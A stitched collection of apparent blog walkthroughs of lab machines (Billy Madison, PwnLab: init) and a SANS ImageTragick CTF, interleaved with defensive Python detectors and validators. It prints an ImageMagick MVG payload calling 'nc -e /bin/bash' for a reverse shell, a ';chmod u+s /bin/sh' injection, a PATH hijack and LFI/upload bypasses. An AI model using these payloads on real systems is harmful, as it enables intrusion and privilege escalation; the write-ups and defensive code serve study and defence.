root@mrb3n:~/Desktop/billymadison# mount -t vfat /dev/mapper/billy /root/Desktop/billymadison/BowelMovement 

Browsing to the mountpoint I was presented with another zip file as well as a .doc file containing Billy’s final project. My heart sank for a moment, wondering what additional final password cracking challenge the author had in store. Lucky for us he was gracious enough to give up the final flag without a fight.

root@mrb3n:/media/root/4ED7-715F# unzip secret.zip 
Archive:  secret.zip
  inflating: Billy_Madison_12th_Grade_Final_Project.doc  
  inflating: THE-END.txt

The End

root@mrb3n:/media/root/4ED7-715F# cat THE-END.txt 
Congratulations!

If you're reading this, you win!

I hope you had fun.  I had an absolute blast putting this together.

I'd love to have your feedback on the box - or at least know you pwned it!

Please feel free to shoot me a tweet or email (7ms@7ms.us) and let me know with
the subject line: "Stop looking at me swan!"

Thanks much,

Brian Johnson
7 Minute Security
www.7ms.us

Billy Madison 12th Grade Final Project

Billy Madison
Final Project
Knibb High

                                       The Industrial Revolution

The Industrial Revolution to me is just like a story I know called "The Puppy Who Lost His Way." 
The world was changing, and the puppy was getting... bigger.

So, you see, the puppy was like industry. In that, they were both lost in the woods.
And nobody, especially the little boy - "society" - knew where to find 'em. 
Except that the puppy was a dog. 
But the industry, my friends, that was a revolution.

KNIBB HIGH FOOTBALL RULES!!!!!



-BM

Final thoughts

This boot2root was a ton of fun and brought me back to my childhood watching classic Adam Sandler movies. The author definitely upped the challenge from his previous Tommy Boy VM and presented us with a highly polished, well thought out scenario which required iterative/out-of-the-box thinking as well as chaining together a variety of tactics and tools.

Thanks to and props to @7minsec for putting together another great challenge and, as always, thank you to @g0tmi1k for keeping the #vulnhub community up and running.

PwnLab: init vulnhub walkthrough

It has been raining VMs lately over at vulnhub.com.

The latest, PwnLab: init, can be obtained here: https://www.vulnhub.com/entry/pwnlab-init,158/

Like 6Days Lab this had another fun web challenge.

As always, I started out with a super stealthy nmap scan 😉.

Interesting, we have port 80 and 3306 (MySQL) open.

I fired up Hydra to attempt to brute force the MySQL login (because why not) and then loaded up the web application.

I spent quite some time here, attempted to brute force the login, checked for SQL injection, all to no avail.  The ‘page’ parameter on the main page looked ripe for LFI but all attempts thus far had failed. After some extensive research I came across this post which looked extremely promising and was very well researched and written:

https://diablohorn.com/2010/01/16/interesting-local-file-inclusion-method/

Basically, PHP's php://input wrapper lets the included resource be the raw POST body, and the related php://filter wrapper lets you apply filters (such as base64 encoding) to a resource read by functions such as readfile() or include(). In this instance, the server let me read certain source files, echoing the contents back base64 encoded. Sweet!
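From the defender's side, the wrapper technique just described is easy to spot in web server logs, because the include parameter carries a literal scheme or traversal sequence. The following is an added example, not from the original post or the PwnLab VM: a small detector that parses Apache common-format access-log lines (the lines below are constructed), percent-decodes the include-style parameters, and reports any value that names a PHP stream wrapper, contains directory traversal, or is an absolute path. The parameter names in INCLUDE_PARAMS are assumptions about typical applications, not taken from the VM.

```python
"""Spot PHP stream-wrapper and traversal abuse in include-style request parameters."""
import re
from urllib.parse import parse_qs, urlsplit

# Constructed access-log lines in Apache common log format (not from the PwnLab VM).
SAMPLE_LOG = """\
10.0.0.5 - - [20/Aug/2016:10:01:02 +0000] "GET /?page=login HTTP/1.1" 200 512
10.0.0.9 - - [20/Aug/2016:10:01:40 +0000] "GET /?page=php://filter/convert.base64-encode/resource=config HTTP/1.1" 200 1290
10.0.0.9 - - [20/Aug/2016:10:02:11 +0000] "POST /?page=php://input HTTP/1.1" 200 77
10.0.0.9 - - [20/Aug/2016:10:02:30 +0000] "GET /?page=..%2F..%2F..%2Fetc%2Fpasswd HTTP/1.1" 200 0
10.0.0.5 - - [20/Aug/2016:10:03:00 +0000] "GET /?page=upload HTTP/1.1" 200 640
"""

# client ip, timestamp, method, request target, status; the rest of the line is ignored.
LOG_RE = re.compile(r'^(\S+) \S+ \S+ \[([^\]]+)\] "(\S+) (\S+) [^"]*" (\d{3})')

# Parameter names that applications commonly pass straight to include()/require().
# Assumed for the example; tune to the application being monitored.
INCLUDE_PARAMS = ("page", "lang", "file", "template", "include")

CHECKS = (
    # Any scheme here means the include is reading something other than a plain file.
    ("php_wrapper", re.compile(r"^(php|data|expect|phar|zip|glob)://", re.I)),
    # A '..' path component, after percent-decoding, in either slash style.
    ("traversal", re.compile(r"(^|[\\/])\.\.([\\/]|$)")),
    # Absolute paths point outside the application's own template directory.
    ("absolute_path", re.compile(r"^/")),
)


def classify(value):
    """Return the names of the checks the decoded parameter value trips."""
    return [name for name, rx in CHECKS if rx.search(value)]


def scan_log(text, params=INCLUDE_PARAMS):
    """Return one hit per suspicious (request, parameter, value) triple."""
    hits = []
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m:
            continue
        ip, ts, method, target, status = m.groups()
        # parse_qs percent-decodes, so ..%2F.. is inspected as ../..
        query = parse_qs(urlsplit(target).query, keep_blank_values=True)
        for param in params:
            for value in query.get(param, []):
                reasons = classify(value)
                if reasons:
                    hits.append({"ip": ip, "time": ts, "method": method,
                                 "param": param, "value": value,
                                 "status": int(status), "reasons": reasons})
    return hits


if __name__ == "__main__":
    for hit in scan_log(SAMPLE_LOG):
        print(hit["ip"], hit["method"], hit["param"], hit["value"], hit["reasons"])
```

Note the limitation this walkthrough itself exposes: the common log format records only the query string, so an include driven by a cookie (as with the lang cookie later in this post) is invisible unless the server's log format is extended to record the Cookie header.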

Well, I knew the config.php file existed but had not yet been able to read it, so I might as well go for the gold first. Throwing the request to Burp repeater got me my first bit of data.

Decoding the stream I was presented with credentials for the MySQL instance.

I also took the time to read the upload.php page.

The source of the upload.php page was particularly interesting. I could see that any uploaded document had to pass 3 checks before being accepted: 1) it had to have a .jpg, .jpeg, .gif or .png extension; 2) the MIME type had to match one of the four extensions; and 3) it could not have multiple file extensions.

Logging in with the MySQL credentials I was presented with a database named 'Users' with 3 entries with base64-encoded passwords.

The user table

Heading back over to the web application I was able to log in with one of the users and was presented with a simple upload form.

I needed to upload some PHP code (preferably a reverse shell) but trick the server into thinking I uploaded a valid gif file. Just putting the ‘GIF’ header in before the PHP started did the trick.

Now I needed a way to execute the PHP within the "gif" image file. Looking back at what I had, I pulled up the source of the index.php page. This page shows that the "lang" parameter gets set as a cookie. Perhaps this could be used to run our PHP code?

After some flopping around, the following ran for me and gave a hit on my listener.

Once in, I turned to g0tmi1k's handy privilege escalation guide (https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/) and started enumerating the file system. After a while I turned up a SUID binary owned by the user Mike. Great, my favorite.

The binary file was tiny so I did not expect too much was going on. Running it gets me a “permission denied” for trying to cat out a file in Mike’s home directory.

Loading up my trusty demo version of IDA confirmed that nothing more was going on.

Now, the binary was meant to call 'cat', but not by its absolute path, so I could not use a symlink. I know that you can abuse a user's PATH variable (http://www.dankalia.com/tutor/01005/0100501004.htm), but how could the two be combined? Since the binary runs as Mike I figured that this was not the path to obtain root but just the first step in privilege escalation. I moved over to the /tmp directory, created a file named 'cat' with /bin/sh as the contents and modified it to be executable.

Now, if I just ran the 'cat' command it would run /bin/sh. Cool. The next step was running the binary to call my fake 'cat' binary. Changing my PATH to just "." meant that I could still run the msgmike binary by typing out its absolute path (/home/kane/msgmike), while its bare 'cat' would resolve to my fake one. Doing this spawned a shell as Mike, and after fixing up my PATH I was in as this user and ready for the next step.
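The msgmike step above needs two things to line up: a privileged program that calls a tool by its bare name, and a PATH the caller controls. The following is an added example, not from the original post or the VM, of the check a hardening script could apply to a PATH value (empty or relative entries, which both mean "search the current directory", missing directories, and directories other users can write to), together with the way a privileged helper should invoke a tool instead: absolute program path, no shell, and an environment it sets itself. SAFE_PATH is an assumed Debian-style default, and the world-writable directory in the demo is constructed in a temporary location.

```python
"""Audit a PATH value for entries that let a bare command name be hijacked."""
import os
import stat
import subprocess
import tempfile

# Assumed sane default for a privileged helper; adjust to the host's layout.
SAFE_PATH = "/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin"


def audit_path(path_value, check_fs=True):
    """Return (position, entry, reason) for each risky PATH entry."""
    findings = []
    for pos, entry in enumerate(path_value.split(os.pathsep)):
        if entry in ("", "."):
            # Both mean "the caller's current directory", the trick used above.
            findings.append((pos, entry, "current directory is searched"))
        elif not os.path.isabs(entry):
            findings.append((pos, entry, "relative entry resolves from current directory"))
        elif check_fs:
            try:
                st = os.stat(entry)
            except OSError:
                findings.append((pos, entry, "directory does not exist"))
                continue
            if st.st_mode & (stat.S_IWGRP | stat.S_IWOTH):
                # The sticky bit does not help: anyone can still create a new 'cat' here.
                findings.append((pos, entry, "writable by group/other"))
    return findings


def run_fixed(argv, env_path=SAFE_PATH):
    """How a privileged helper should call a tool: absolute path, no shell, own environment."""
    if not os.path.isabs(argv[0]):
        raise ValueError("program must be given by absolute path")
    return subprocess.run(argv, env={"PATH": env_path}, capture_output=True, text=True)


def demo_writable_dir():
    """Constructed world-writable directory, audited as if it were on PATH."""
    d = tempfile.mkdtemp(prefix="path_audit_demo_")
    os.chmod(d, 0o777)
    return audit_path(d)


if __name__ == "__main__":
    for pos, entry, reason in audit_path(os.environ.get("PATH", "")):
        print("PATH[%d]=%r: %s" % (pos, entry, reason))
```

The fix for the binary itself is the run_fixed pattern: once the program path is absolute and the environment is not inherited, nothing the caller puts in PATH (or IFS, or LD_PRELOAD) changes what runs.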

Oh hey, another binary! This one didn't need much of a look. Like the previous one, I can see it is just running one command: dropping the user into a 'Message for root:' prompt and then echoing the user-supplied message out to /root/messages.txt.

Never trust user-supplied input! This one has command injection all over it. If we type a ; after the 'Message for root:' prompt, the echo command ends there and whatever follows runs as a command of our choice. I ran it first with ';id' and it shows the EUID for root.

To become root we can append the command ';chmod u+s /bin/sh'. This is not very stealthy, as it involves a change to the file system (which we would not typically want to do in a production environment).
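The root cause of the msg2root bug is that the message is spliced into a shell command line, so the shell, not the program, decides where the message ends. The following is an added example, not from the original post or the VM, that shows the same task done two ways: the unsafe pattern (kept only for contrast, and not exercised) and a safe version that writes the file directly, so ';' and friends are just bytes, and that also flattens control characters so a message cannot forge extra log lines. Paths used by the demo are constructed in a temporary directory.

```python
"""Append a user-supplied message to a file without ever handing it to a shell."""
import os
import subprocess
import tempfile


def append_message_unsafe(path, message):
    """The msg2root pattern: user text interpolated into a shell command line.

    Any ';', '|', '$(...)' or backtick in message becomes a command with the
    caller's privileges. Shown for contrast only; do not use.
    """
    subprocess.run("echo " + message + " >> " + path, shell=True, check=True)


def append_message_safe(path, message, max_len=1024):
    """Write the text directly: no shell is involved, so metacharacters stay literal.

    Control characters (including newlines) are replaced so that one call always
    produces exactly one line, which keeps the log parseable and un-forgeable.
    Returns the text as written (without the trailing newline).
    """
    if not isinstance(message, str):
        raise TypeError("message must be str")
    if len(message) > max_len:
        raise ValueError("message too long")
    cleaned = "".join(ch if ch.isprintable() else " " for ch in message)
    with open(path, "a", encoding="utf-8") as fh:
        fh.write(cleaned + "\n")
    return cleaned


def demo():
    """Write two messages containing shell metacharacters and a newline; return the file's lines."""
    d = tempfile.mkdtemp(prefix="msg_demo_")
    path = os.path.join(d, "messages.txt")   # constructed stand-in for /root/messages.txt
    append_message_safe(path, "hello; id")
    append_message_safe(path, "line one\nline two")
    with open(path, encoding="utf-8") as fh:
        return fh.read().splitlines()


if __name__ == "__main__":
    print(demo())
```

If a privileged helper genuinely must run another program with user input, the same rule applies as for msgmike: pass the input as an argv element to subprocess.run([...]) with shell=False, never as part of a command string.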

I was fully expecting another binary challenge to grab the flag, but alas it was just a text file.

Shout-out to @chronicoder for putting together an awesome challenge. Looking forward to the next one.

Thanks goes to @g0tmi1k and the vulnhub team for keeping these resources flowing.

One-Hour CtF review

A colleague of mine who is very involved with SANS sent me an invitation for a new event last week called 'One-Hour Ctf'. The event, hosted by Ed Skoudis and the team that puts together the SANS NetWars and Holiday Hack Challenge, was invite-only and capped at 100 people, so I felt special. The premise is simple: once per quarter the team will hold a lunchtime CTF event that starts out with a discussion of a relevant topic, then turns the participants loose for 40 minutes to capture 1 or more flags, ending with a discussion of the solution and notification of the winners.

https://www.onehourctf.com/

The first event dealt with the recent imagemagick exploit(s) (http://imagetragick.com/). The presenters did a great quick walk-through of the vulnerability and provided some slides with additional info. One of the best parts of this event was that you do not need to spin up a VM and can participate from any PC that has a web browser. Once logged in to the site, each participant is given their own Docker image based on Avocado with console access to an attacking machine as well as browser access to the target web application.

The challenge consisted of uploading a malicious image file, catching a shell and reading out a flag. To grab a reverse shell I uploaded a file with a jpeg extension containing the following:

push graphic-context
viewbox 0 0 640 480
fill 'url(https://blah.com/blah.png";nc -e /bin/bash 8080")'
pop graphic-context

I fired up a netcat listener and uploaded the image. Since there were so many people uploading at the same time it took a while but I eventually got a shell back and the first flag. There was a second flag which utilized another portion of the imagemagick vulnerability chained together with a misconfiguration. While I did end up obtaining both flags, I will not post the solution for the second as the organizers did not discuss it.
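Both upload challenges in this post succeeded for the same underlying reason: the server trusted what the client said about the file. In PwnLab the three checks (allowed extension, matching MIME type, single extension) were satisfied by putting a GIF header in front of PHP code, and in the ImageMagick exercise a text MVG file was accepted under a .jpeg extension and then interpreted by ImageMagick. The following is an added example, not taken from either challenge's code, of a validator that keeps the three PwnLab checks but derives the type from the file's own bytes, requires it to match the extension, and rejects polyglots that carry script tags. All sample payloads in the test are constructed; TINY_GIF is a hand-built minimal GIF.

```python
"""Validate an image upload from its bytes rather than from what the client claims."""
import os

# Magic bytes for the four extensions the PwnLab upload form accepted.
MAGIC = (
    ("jpeg", (b"\xff\xd8\xff",)),
    ("gif", (b"GIF87a", b"GIF89a")),
    ("png", (b"\x89PNG\r\n\x1a\n",)),
)
EXT_TO_KIND = {"jpg": "jpeg", "jpeg": "jpeg", "gif": "gif", "png": "png"}
ALLOWED_MIME = {"image/jpeg", "image/gif", "image/png"}
# Heuristic: an "image" that carries a script open tag is a polyglot, not a picture.
SCRIPT_TAGS = (b"<?php", b"<?=", b"<script")

# Constructed 1x1 GIF used by the demo and the checks below.
TINY_GIF = (b"GIF89a\x01\x00\x01\x00\x80\x00\x00\x00\x00\x00\xff\xff\xff"
            b",\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;")


def sniff(data):
    """Return 'jpeg', 'gif' or 'png' from the leading bytes, or None."""
    for kind, sigs in MAGIC:
        if any(data.startswith(s) for s in sigs):
            return kind
    return None


def validate_upload(filename, client_mime, data):
    """Return (accepted, reason). Cheap name checks first, content checks last."""
    name = os.path.basename(filename)          # ignore any directory the client sent
    parts = name.lower().split(".")
    if len(parts) != 2 or not parts[0] or not parts[1]:
        return False, "filename must be name.ext with exactly one extension"
    ext = parts[1]
    if ext not in EXT_TO_KIND:
        return False, "extension ." + ext + " not allowed"
    if client_mime not in ALLOWED_MIME:
        # Client-supplied, so this can only reject; it never proves anything.
        return False, "declared mime type not allowed"
    kind = sniff(data)
    if kind is None:
        # Catches text formats (MVG, SVG, MSL) smuggled in under an image extension.
        return False, "content is not a JPEG, GIF or PNG"
    if kind != EXT_TO_KIND[ext]:
        return False, "content is %s but extension says .%s" % (kind, ext)
    if any(tag in data.lower() for tag in SCRIPT_TAGS):
        # Catches the GIF-header-plus-PHP trick from the PwnLab section.
        return False, "image carries an embedded script tag"
    return True, "ok"


if __name__ == "__main__":
    print(validate_upload("photo.gif", "image/gif", TINY_GIF))
    print(validate_upload("photo.jpeg", "image/jpeg", b"push graphic-context\n"))
```

Two caveats a reviewer would raise: the script-tag scan is a heuristic, and the robust version re-encodes the image through an image library and stores it under a server-chosen name outside the web root, so that nothing the client controls ever reaches include() or a path. A genuine JPEG can still be malicious if the decoder itself is vulnerable, which is why the ImageTragick mitigation also involved ImageMagick's policy.xml (disabling coders such as MVG and MSL) rather than upload filtering alone.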

Overall I thoroughly enjoyed the event and thought the organizers/presenters pulled it off flawlessly during the one hour time frame, which is quite a feat (especially for a beta run).

The final scoreboard: